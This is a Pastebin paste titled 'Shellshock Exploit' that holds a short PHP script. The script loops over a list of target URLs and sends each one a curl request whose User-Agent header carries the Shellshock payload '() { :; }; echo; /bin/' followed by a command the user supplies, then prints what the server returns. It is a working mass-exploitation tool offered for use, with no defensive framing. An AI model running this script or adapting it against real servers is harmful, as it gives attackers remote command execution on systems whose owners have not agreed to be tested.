Advertisement
Evoo

Shellshock Exploit

May 30th, 2016
3,060
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.73 KB | None | 0 0
  1. <?php
  2. /*
  3.  
  4. CODED BY : Evoo
  5.  
  6. */
  7.  
  8. if(!isset($argv[1],$argv[2]))
  9. {
  10. die("How To Use: ".$_SERVER['PHP_SELF']." listurl.txt linuxcommand\n");
  11. }
  12. else
  13. {
  14.  
  15. $getfile=@file_get_contents($argv[1]);
  16. $pecah=explode("\r\n",$getfile);
  17. foreach ($pecah as $links){
  18.   print "[Scan]=>$links\n";
  19.   pwn($links,$argv[2]);
  20. }
  21. }
  22. function pwn ($site,$cmd){
  23. $useragent =  "() { :; }; echo; /bin/".$cmd."";
  24. //$useragent =  "() { :; }; echo; /bin/uname";
  25. $ch = curl_init($site);
  26. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  27. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  28. $postResult = curl_exec($ch);
  29. print_r("\t".$postResult);
  30. /*if (eregi("Linux",$postResult)){
  31.     echo "[+]Vulnerable\n";
  32. }else{
  33.         echo "[-]Tidak Vuln\n";
  34. }
  35. */
  36. }
  37.  
  38. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement